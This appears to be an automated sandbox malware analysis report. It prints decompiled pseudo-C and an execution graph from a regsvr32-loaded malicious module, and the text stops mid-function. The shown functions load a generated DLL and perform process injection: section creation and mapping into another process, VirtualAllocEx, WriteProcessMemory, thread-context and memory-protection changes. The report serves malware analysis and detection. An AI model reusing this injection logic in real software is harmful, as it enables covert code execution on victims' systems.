					E042A9E51( &_v140, 0x40, L"%08x", E042AE2C5(_t66 + 0xb0, E042AA43D(_t66 + 0xb0), 0));
					_t20 =  *0x42bf81c; // 0x48efbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E042A9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x42bf81c; // 0x48efbe8
					_t68 = E042A9A5A(_t26 + 0x1020);
					_v12 = _t68;
					E042A8BAF( &_v8);
					_t32 =  *0x42bf81c; // 0x48efbe8
					_t34 = E042A9A5A(_t32 + 0x122a);
					 *0x42bf91c = _t34;
					_t35 =  *0x42bf818; // 0x48ef8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x42bc9a0,  &_v140, ".", L"dll", 0, 0x42bc9a0, _t25, 0x42bc9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x42bf91c);
					 *0x42bf914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E042AF011(0x42bcb8c, _t60);
					}
					 *0x42bf918 = _t38;
					E042A8BF4( &_v12, 0xfffffffe);
					E042A8D6D( &_v140, 0, 0x80);
					if( *0x42bf918 != 0) {
						goto L10;
					} else {
						E042A8BF4(0x42bf91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x42bf918 == 0) {
						_t46 =  *0x42bf850; // 0x48ef9f0
						 *0x42bf918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                                              0x042ad218
                                                                                                                                                                                              0x042ad218
                                                                                                                                                                                              0x042ad218
                                                                                                                                                                                              0x042ad21b
                                                                                                                                                                                              0x042ad227
                                                                                                                                                                                              0x042ad227
                                                                                                                                                                                              0x042ad232
                                                                                                                                                                                              0x042ad24e
                                                                                                                                                                                              0x042ad253
                                                                                                                                                                                              0x042ad25c
                                                                                                                                                                                              0x042ad25e
                                                                                                                                                                                              0x042ad266
                                                                                                                                                                                              0x042ad287
                                                                                                                                                                                              0x042ad28c
                                                                                                                                                                                              0x042ad291
                                                                                                                                                                                              0x042ad299
                                                                                                                                                                                              0x042ad2a6
                                                                                                                                                                                              0x042ad2b4
                                                                                                                                                                                              0x042ad2c5
                                                                                                                                                                                              0x042ad2cb
                                                                                                                                                                                              0x042ad2ce
                                                                                                                                                                                              0x042ad2e5
                                                                                                                                                                                              0x042ad2f1
                                                                                                                                                                                              0x042ad2f9
                                                                                                                                                                                              0x042ad300
                                                                                                                                                                                              0x042ad306
                                                                                                                                                                                              0x042ad312
                                                                                                                                                                                              0x042ad318
                                                                                                                                                                                              0x042ad31f
                                                                                                                                                                                              0x042ad332
                                                                                                                                                                                              0x042ad321
                                                                                                                                                                                              0x042ad321
                                                                                                                                                                                              0x042ad324
                                                                                                                                                                                              0x042ad32a
                                                                                                                                                                                              0x042ad32f
                                                                                                                                                                                              0x042ad334
                                                                                                                                                                                              0x042ad33f
                                                                                                                                                                                              0x042ad351
                                                                                                                                                                                              0x042ad363
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad365
                                                                                                                                                                                              0x042ad36c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad372
                                                                                                                                                                                              0x042ad373
                                                                                                                                                                                              0x042ad373
                                                                                                                                                                                              0x042ad37a
                                                                                                                                                                                              0x042ad37c
                                                                                                                                                                                              0x042ad381
                                                                                                                                                                                              0x042ad381
                                                                                                                                                                                              0x042ad386
                                                                                                                                                                                              0x042ad38a
                                                                                                                                                                                              0x042ad38a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 5dcfcb9b25f3b8be8e9c058be7c9b4cb9de146c409950c7145f18ccd1622f825
                                                                                                                                                                                              • Instruction ID: b4c4b8468ea3ed32cfe720f6fff318fc0040cb74031b632029a37306cfb76e31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dcfcb9b25f3b8be8e9c058be7c9b4cb9de146c409950c7145f18ccd1622f825
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31B1B1760604BFE710AA69FD48FDA73ADEB45318F118176F844D3180DA38AE958BE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B3674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042B3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E042B358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E042AA43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x42bcf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x42bcf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L042B8935();
				return _t29 - _t22;
			}

















                                                                                                                                                                                              0x042b3674
                                                                                                                                                                                              0x042b367f
                                                                                                                                                                                              0x042b3686
                                                                                                                                                                                              0x042b368d
                                                                                                                                                                                              0x042b3693
                                                                                                                                                                                              0x042b369b
                                                                                                                                                                                              0x042b369c
                                                                                                                                                                                              0x042b369e
                                                                                                                                                                                              0x042b36a3
                                                                                                                                                                                              0x042b36ab
                                                                                                                                                                                              0x042b36ab
                                                                                                                                                                                              0x042b36ae
                                                                                                                                                                                              0x042b36b2
                                                                                                                                                                                              0x042b36a5
                                                                                                                                                                                              0x042b36a5
                                                                                                                                                                                              0x042b36a9
                                                                                                                                                                                              0x042b36ab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b36ab
                                                                                                                                                                                              0x042b36a9
                                                                                                                                                                                              0x042b36bb
                                                                                                                                                                                              0x042b36c4
                                                                                                                                                                                              0x042b36c9
                                                                                                                                                                                              0x042b36cc
                                                                                                                                                                                              0x042b36cf
                                                                                                                                                                                              0x042b36d2
                                                                                                                                                                                              0x042b36d4
                                                                                                                                                                                              0x042b36d4
                                                                                                                                                                                              0x042b36da
                                                                                                                                                                                              0x042b36dd
                                                                                                                                                                                              0x042b36e0
                                                                                                                                                                                              0x042b36e3
                                                                                                                                                                                              0x042b36e8
                                                                                                                                                                                              0x042b36ea
                                                                                                                                                                                              0x042b36ea
                                                                                                                                                                                              0x042b36f0
                                                                                                                                                                                              0x042b36fc
                                                                                                                                                                                              0x042b36fe
                                                                                                                                                                                              0x042b370a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 042B36BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 042B36FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: 795e77292025ea3543bd40011fe22ea7e461dec0997eb090028cd2f45a7c09ad
                                                                                                                                                                                              • Instruction ID: 11584ee3f26995382319c72662684cb2f229706bf63a8ae8fe06fa390651994f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 795e77292025ea3543bd40011fe22ea7e461dec0997eb090028cd2f45a7c09ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43110232B106899BCF00DF69E8080DE7BB5FF94390B2285A9DC9592241EB30E5A487C5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:417
                                                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                                                              execution_graph 22650 4af632e 22651 4af633e ExitProcess 22650->22651 22686 4aff0ad lstrlenA RtlAllocateHeap HeapFree memset 22711 4afbaab GetCurrentProcessId 22721 4af2a2b 40 API calls 22722 4af1228 53 API calls 22723 4afde26 10 API calls 22687 4af28a4 8 API calls 22690 4b0083c RtlAllocateHeap 22706 4af5922 RtlAllocateHeap HeapFree memset 22699 4af29a1 16 API calls 22688 4b044a0 6 API calls 22707 4af353c 91 API calls 22728 4af27bb 8 API calls 22742 4af1f36 RtlAllocateHeap HeapFree memset MultiByteToWideChar 22701 4af59b1 14 API calls 22729 4af33b1 memset lstrlenW _ftol2_sse 22730 4af1fb0 9 API calls 22702 4af598e 12 API calls 22703 4af298d HeapFree memset 22714 4af6e8c memset K32GetModuleFileNameExW lstrcpynW RtlAllocateHeap 22731 4af2b84 33 API calls 22692 4aff402 memset lstrcmpiA GetLastError 22732 4af2782 40 API calls 22743 4af1301 94 API calls 22693 4af201c 13 API calls 22715 4af2297 10 API calls 22652 4ac0790 22653 4ac0bf9 22652->22653 22675 4abf9d0 22653->22675 22655 4ac0d2f 22678 4abff20 VirtualAlloc 22655->22678 22657 4ac0d68 22658 4ac0d6c 22657->22658 22659 4abf9d0 VirtualAlloc 22657->22659 22661 4ac0fc9 22659->22661 22660 4ac102b 22661->22660 22662 4ac115d 22661->22662 22682 4ac0340 22661->22682 22664 4ac0340 2 API calls 22662->22664 22666 4ac118a 22664->22666 22668 4ac0340 2 API calls 22666->22668 22667 4ac0340 2 API calls 22670 4ac1130 22667->22670 22669 4ac11b7 22668->22669 22671 4ac0340 2 API calls 22669->22671 22672 4ac0340 2 API calls 22670->22672 22673 4ac11e4 22671->22673 22672->22662 22674 4ac0340 2 API calls 22673->22674 22674->22660 22676 4abfa11 22675->22676 22677 4abfa44 VirtualAlloc 22676->22677 22677->22655 22679 4abff88 22678->22679 22680 4ac011f 22679->22680 22681 4ac00f1 VirtualProtect 22679->22681 22680->22657 22681->22679 22683 4ac0430 22682->22683 22684 4ac036e 22682->22684 22683->22667 22684->22683 22685 4ac03c6 VirtualProtect VirtualProtect 22684->22685 22685->22683 22191 4af64ef 22192 4af64fd 22191->22192 22193 4af6555 22191->22193 22220 4af8bc9 HeapCreate 22192->22220 22195 4af6502 22221 4af9591 22195->22221 22204 4af655a 22241 4af8baf 22204->22241 22205 4af6550 22207 4af8baf 2 API calls 22205->22207 22207->22193 22213 4af65b1 CreateThread 22213->22193 22301 4af6298 22213->22301 22214 4aff05c 8 API calls 22215 4af658c 22214->22215 22254 4af6370 6 API calls 22215->22254 22217 4af6596 22255 4af8bf4 22217->22255 22220->22195 22260 4af8bde RtlAllocateHeap 22221->22260 22223 4af6507 22224 4b03cd5 22223->22224 22225 4b03d0a 22224->22225 22261 4af8c43 22225->22261 22227 4af6515 22228 4aff05c 22227->22228 22265 4af9dd8 22228->22265 22231 4aff07e GetModuleHandleA 22233 4aff08d 22231->22233 22232 4aff086 LoadLibraryA 22232->22233 22234 4aff09b 22233->22234 22268 4aff011 22233->22268 22273 4af8b9c 22234->22273 22238 4af9df2 22291 4af8ac6 22238->22291 22242 4af8bbd 22241->22242 22243 4af655f 22241->22243 22244 4af8bf4 2 API calls 22242->22244 22245 4af109a 22243->22245 22244->22243 22246 4af8ac6 2 API calls 22245->22246 22247 4af10b5 22246->22247 22248 4af9cb5 22247->22248 22249 4af9cd1 22248->22249 22250 4af6573 22249->22250 22297 4af8bde RtlAllocateHeap 22249->22297 22250->22213 22250->22214 22252 4af9ce4 22252->22250 22253 4af8bf4 2 API calls 22252->22253 22253->22250 22254->22217 22256 4af65a1 22255->22256 22257 4af8bfe 22255->22257 22256->22213 22257->22256 22298 4af8d6d 22257->22298 22260->22223 22264 4af8bde RtlAllocateHeap 22261->22264 22263 4af8c54 22263->22227 22264->22263 22277 4af89ef 22265->22277 22284 4af8bde RtlAllocateHeap 22268->22284 22270 4aff023 22272 4aff052 22270->22272 22285 4afeebb 22270->22285 22272->22234 22274 4af652b 22273->22274 22275 4af8ba4 22273->22275 22274->22238 22276 4af8bf4 2 API calls 22275->22276 22276->22274 22278 4af8a12 lstrlenA 22277->22278 22280 4af8a78 22278->22280 22282 4af8a81 22278->22282 22283 4af8bde RtlAllocateHeap 22280->22283 22282->22231 22282->22232 22283->22282 22284->22270 22286 4afef2f 22285->22286 22288 4afeed4 22285->22288 22286->22270 22287 4afef87 LoadLibraryA 22287->22286 22289 4afef95 GetProcAddress 22287->22289 22288->22286 22288->22287 22289->22286 22290 4afefa1 22289->22290 22290->22286 22294 4af8ae4 lstrlenA 22291->22294 22296 4af8bde RtlAllocateHeap 22294->22296 22295 4af653c GetFileAttributesW 22295->22204 22295->22205 22296->22295 22297->22252 22299 4af8c2e HeapFree 22298->22299 22300 4af8d76 memset 22298->22300 22299->22256 22300->22299 22313 4af6412 22301->22313 22305 4af62a9 22307 4af62e3 22305->22307 22312 4af62b3 22305->22312 22376 4afd804 22305->22376 22308 4af631a 22307->22308 22309 4af6313 22307->22309 22308->22312 22393 4af35a1 RtlAllocateHeap lstrlenW _ftol2_sse 22308->22393 22392 4af611b 91 API calls 22309->22392 22314 4aff05c 8 API calls 22313->22314 22315 4af6426 22314->22315 22316 4aff05c 8 API calls 22315->22316 22317 4af643f 22316->22317 22318 4aff05c 8 API calls 22317->22318 22319 4af6458 22318->22319 22320 4aff05c 8 API calls 22319->22320 22321 4af6471 22320->22321 22322 4aff05c 8 API calls 22321->22322 22323 4af648a 22322->22323 22324 4aff05c 8 API calls 22323->22324 22325 4af64a1 22324->22325 22326 4aff05c 8 API calls 22325->22326 22327 4af64b8 22326->22327 22328 4aff05c 8 API calls 22327->22328 22329 4af64cf 22328->22329 22330 4aff05c 8 API calls 22329->22330 22331 4af629d GetOEMCP 22330->22331 22332 4afdf3d 22331->22332 22394 4af8bde RtlAllocateHeap 22332->22394 22334 4afdf58 22335 4afdf63 GetCurrentProcessId 22334->22335 22375 4afe2b8 22334->22375 22336 4afdf7b 22335->22336 22395 4afc879 22336->22395 22338 4afdfdf 22411 4aff3a3 22338->22411 22339 4afdfce 22339->22338 22402 4afc8c9 22339->22402 22344 4afe014 22345 4afe05e GetLastError 22344->22345 22346 4afe064 GetSystemMetrics 22344->22346 22345->22346 22347 4afe08b 22346->22347 22420 4afc6ce 22347->22420 22353 4afe0c6 22437 4afc6e4 22353->22437 22358 4af8d6d memset 22359 4afe11d GetVersionExA 22358->22359 22456 4afdd39 22359->22456 22363 4afe13b GetWindowsDirectoryW 22364 4af9df2 2 API calls 22363->22364 22365 4afe15e 22364->22365 22366 4af8baf 2 API calls 22365->22366 22367 4afe198 22366->22367 22369 4afe1d0 22367->22369 22479 4af9e51 22367->22479 22462 4b0351a 22369->22462 22375->22305 22550 4afd6dc 22376->22550 22379 4afd950 22379->22307 22381 4afd945 22383 4af8bf4 2 API calls 22381->22383 22382 4afd933 22382->22381 22384 4af8bf4 2 API calls 22382->22384 22383->22379 22384->22382 22385 4af8d6d memset 22386 4afd841 22385->22386 22386->22381 22386->22382 22386->22385 22389 4afd8b4 GetLastError 22386->22389 22391 4afd8de FindCloseChangeNotification 22386->22391 22562 4afbc84 22386->22562 22567 4afd959 22386->22567 22580 4afda57 ResumeThread 22389->22580 22391->22386 22392->22312 22393->22312 22394->22334 22396 4afc890 22395->22396 22397 4afc894 22396->22397 22483 4afc862 22396->22483 22397->22339 22400 4afc8b9 FindCloseChangeNotification 22401 4afc8a5 22400->22401 22401->22339 22496 4afc79e GetCurrentThread OpenThreadToken 22402->22496 22405 4afc97f 22405->22338 22406 4afc7f5 6 API calls 22407 4afc8fd FindCloseChangeNotification 22406->22407 22407->22405 22409 4afc975 22407->22409 22410 4af8bf4 2 API calls 22409->22410 22410->22405 22413 4aff3c2 22411->22413 22412 4afe009 22415 4aff368 22412->22415 22413->22412 22501 4af98bd RtlAllocateHeap 22413->22501 22416 4aff37f 22415->22416 22417 4aff39f 22416->22417 22502 4af98bd RtlAllocateHeap 22416->22502 22417->22344 22419 4aff38c 22419->22344 22503 4afc5ec 22420->22503 22422 4afc6e2 22423 4afc4c1 22422->22423 22424 4afc4dc 22423->22424 22425 4af9dd8 2 API calls 22424->22425 22426 4afc4e6 22425->22426 22518 4b03674 22426->22518 22428 4afc531 22429 4af8b9c 2 API calls 22428->22429 22431 4afc53d 22429->22431 22430 4afc4fb 22430->22428 22432 4b03674 2 API calls 22430->22432 22433 4af99df 22431->22433 22432->22430 22434 4af99eb MultiByteToWideChar 22433->22434 22435 4af99e6 22433->22435 22436 4af99ff 22434->22436 22435->22353 22436->22353 22438 4af9dd8 2 API calls 22437->22438 22439 4afc6fd 22438->22439 22440 4af9dd8 2 API calls 22439->22440 22442 4afc709 22440->22442 22441 4afc799 22450 4afca46 22441->22450 22442->22441 22443 4b03674 2 API calls 22442->22443 22444 4afc75a 22442->22444 22443->22442 22445 4b03674 2 API calls 22444->22445 22446 4afc785 22444->22446 22445->22444 22447 4af8b9c 2 API calls 22446->22447 22448 4afc791 22447->22448 22449 4af8b9c 2 API calls 22448->22449 22449->22441 22451 4afca5e 22450->22451 22452 4afc7f5 6 API calls 22451->22452 22453 4afca62 22451->22453 22454 4afca76 22452->22454 22453->22358 22454->22453 22455 4af8bf4 2 API calls 22454->22455 22455->22453 22457 4afdd5f 22456->22457 22458 4afdd4e GetCurrentProcess IsWow64Process 22456->22458 22459 4afdd62 22457->22459 22458->22457 22460 4afdd6c 22459->22460 22461 4afdd71 GetSystemInfo 22459->22461 22460->22363 22461->22363 22463 4b03525 22462->22463 22465 4afe299 22462->22465 22464 4b03674 2 API calls 22463->22464 22463->22465 22464->22463 22466 4af96da 22465->22466 22523 4af9662 22466->22523 22469 4afdae3 22470 4afdcc8 22469->22470 22471 4af9dd8 2 API calls 22470->22471 22473 4afdcf8 22470->22473 22476 4af8b9c 2 API calls 22470->22476 22529 4af9b33 22470->22529 22471->22470 22535 4afb96a CreateToolhelp32Snapshot 22473->22535 22475 4afdd14 22478 4afdd31 22475->22478 22544 4af9c2c HeapFree memset 22475->22544 22476->22470 22478->22375 22480 4af8d6d memset 22479->22480 22481 4af9e65 _vsnwprintf 22480->22481 22482 4af9e82 22481->22482 22482->22369 22486 4afc7f5 GetTokenInformation 22483->22486 22487 4afc817 GetLastError 22486->22487 22488 4afc834 22486->22488 22487->22488 22489 4afc822 22487->22489 22488->22400 22488->22401 22495 4af8bde RtlAllocateHeap 22489->22495 22491 4afc82a 22491->22488 22492 4afc838 GetTokenInformation 22491->22492 22492->22488 22493 4afc84d 22492->22493 22494 4af8bf4 2 API calls 22493->22494 22494->22488 22495->22491 22497 4afc7eb 22496->22497 22498 4afc7bf GetLastError 22496->22498 22497->22405 22497->22406 22498->22497 22499 4afc7cc OpenProcessToken 22498->22499 22499->22497 22501->22412 22502->22419 22504 4af8d6d memset 22503->22504 22505 4afc60e lstrcpynW 22504->22505 22507 4af9df2 2 API calls 22505->22507 22508 4afc643 GetVolumeInformationW 22507->22508 22509 4af8baf 2 API calls 22508->22509 22510 4afc678 22509->22510 22511 4af9e51 2 API calls 22510->22511 22512 4afc699 lstrcatW 22511->22512 22516 4afa456 22512->22516 22515 4afc6bf 22515->22422 22517 4afa45e CharUpperBuffW 22516->22517 22517->22515 22519 4b03684 22518->22519 22520 4b036b7 lstrlenW 22519->22520 22521 4b036d4 _ftol2_sse 22520->22521 22521->22430 22524 4af9672 22523->22524 22524->22524 22525 4b03674 2 API calls 22524->22525 22526 4af968d 22525->22526 22527 4b03674 2 API calls 22526->22527 22528 4af96c1 22526->22528 22527->22526 22528->22469 22531 4af9b47 22529->22531 22545 4af8bde RtlAllocateHeap 22531->22545 22532 4af9c16 22532->22470 22534 4af9b9f 22534->22532 22546 4af8bde RtlAllocateHeap 22534->22546 22536 4afb994 22535->22536 22537 4afb9bf 22535->22537 22538 4af8d6d memset 22536->22538 22537->22475 22539 4afb9a6 Process32First 22538->22539 22539->22537 22540 4afb9cd 22539->22540 22541 4afb9df Process32Next 22540->22541 22542 4afb9f2 FindCloseChangeNotification 22540->22542 22547 4afda6d 22540->22547 22541->22540 22541->22542 22542->22537 22544->22475 22545->22534 22546->22534 22548 4afdacf Sleep 22547->22548 22549 4afda7e 22547->22549 22548->22540 22549->22548 22551 4afd6fb 22550->22551 22581 4af8bde RtlAllocateHeap 22551->22581 22553 4afd7f3 22553->22379 22558 4afb557 22553->22558 22554 4af9df2 2 API calls 22556 4afd796 22554->22556 22555 4af8baf 2 API calls 22555->22556 22556->22553 22556->22554 22556->22555 22582 4af98bd RtlAllocateHeap 22556->22582 22559 4afb570 22558->22559 22583 4afb4a6 22559->22583 22563 4af8d6d memset 22562->22563 22564 4afbc9a 22563->22564 22565 4af8d6d memset 22564->22565 22566 4afbca7 CreateProcessW 22565->22566 22566->22386 22596 4afd218 22567->22596 22570 4afda49 22643 4afd38b 22570->22643 22575 4af8d6d memset 22576 4afd99f GetThreadContext 22575->22576 22576->22570 22577 4afd9c9 NtProtectVirtualMemory 22576->22577 22577->22570 22578 4afda0b NtWriteVirtualMemory 22577->22578 22578->22570 22579 4afda28 NtProtectVirtualMemory 22578->22579 22579->22570 22580->22386 22581->22556 22582->22556 22584 4b0351a 2 API calls 22583->22584 22585 4afb4be 22584->22585 22586 4af9dd8 2 API calls 22585->22586 22587 4afb4e8 22586->22587 22592 4af9e12 22587->22592 22589 4afb546 22590 4af8b9c 2 API calls 22589->22590 22591 4afb551 22590->22591 22591->22386 22593 4af8d6d memset 22592->22593 22594 4af9e26 _vsnprintf 22593->22594 22595 4af9e40 22594->22595 22595->22589 22597 4afd246 22596->22597 22598 4afd234 22596->22598 22600 4af9df2 2 API calls 22597->22600 22598->22597 22599 4afd373 22598->22599 22599->22570 22622 4afd447 22599->22622 22601 4afd253 22600->22601 22602 4af9e51 2 API calls 22601->22602 22603 4afd28c 22602->22603 22604 4af9df2 2 API calls 22603->22604 22605 4afd2ab 22604->22605 22648 4af9a5a RtlAllocateHeap lstrcatW 22605->22648 22607 4afd2c5 22608 4af8baf 2 API calls 22607->22608 22609 4afd2d3 22608->22609 22649 4af9a5a RtlAllocateHeap lstrcatW 22609->22649 22611 4afd2f6 LoadLibraryW 22613 4afd32f 22611->22613 22614 4afd321 22611->22614 22616 4af8bf4 2 API calls 22613->22616 22615 4aff011 3 API calls 22614->22615 22615->22613 22617 4afd344 22616->22617 22618 4af8d6d memset 22617->22618 22619 4afd356 22618->22619 22619->22599 22620 4af8bf4 2 API calls 22619->22620 22621 4afd371 22620->22621 22621->22599 22623 4afd47a 22622->22623 22624 4afd49b NtCreateSection 22623->22624 22628 4afd68e 22623->22628 22625 4afd4c4 RegisterClassExA 22624->22625 22624->22628 22626 4afd518 CreateWindowExA 22625->22626 22627 4afd554 NtMapViewOfSection 22625->22627 22626->22627 22630 4afd542 DestroyWindow UnregisterClassA 22626->22630 22627->22628 22634 4afd587 NtMapViewOfSection 22627->22634 22629 4afd6c3 22628->22629 22635 4afd6bf NtUnmapViewOfSection 22628->22635 22632 4afd6cc NtClose 22629->22632 22633 4afd6d7 22629->22633 22630->22627 22632->22633 22633->22570 22633->22575 22634->22628 22636 4afd5ab 22634->22636 22635->22629 22637 4af8c43 RtlAllocateHeap 22636->22637 22638 4afd5bb 22637->22638 22638->22628 22639 4afd5ca VirtualAllocEx WriteProcessMemory 22638->22639 22640 4af8bf4 2 API calls 22639->22640 22641 4afd611 22640->22641 22642 4afd674 lstrlenW 22641->22642 22642->22628 22644 4afd394 FreeLibrary 22643->22644 22645 4afd3a2 22643->22645 22644->22645 22646 4afd3c3 22645->22646 22647 4af8bf4 2 API calls 22645->22647 22646->22386 22647->22646 22648->22607 22649->22611 22709 4af296e 15 API calls 22716 4af26ec 12 API calls 22717 4af2aeb 9 API calls 22735 4af5bea 12 API calls 22725 4af1e66 7 API calls 22746 4af1f65 8 API calls 22689 4af34e1 10 API calls 22747 4af377f 18 API calls 22719 4abfaf0 VirtualAlloc 22720 4af1ef0 6 API calls 22748 4af334e 14 API calls 22705 4af61c5 97 API calls 22727 4af2a44 37 API calls 22749 4af3b5d 25 API calls 22710 4af5959 GetLastError 22697 4af2855 GetLastError RtlAllocateHeap HeapFree memset

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 04AFD447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                              			E04AFD447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x4b0f81c; // 0x4c2fbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E04AFF0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x4b0f918; // 0x4c2f9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x4b0f818; // 0x4c2f8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x4b0ce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x4b0f818; // 0x4c2f8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E04AF8C43( *0x4b0f81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
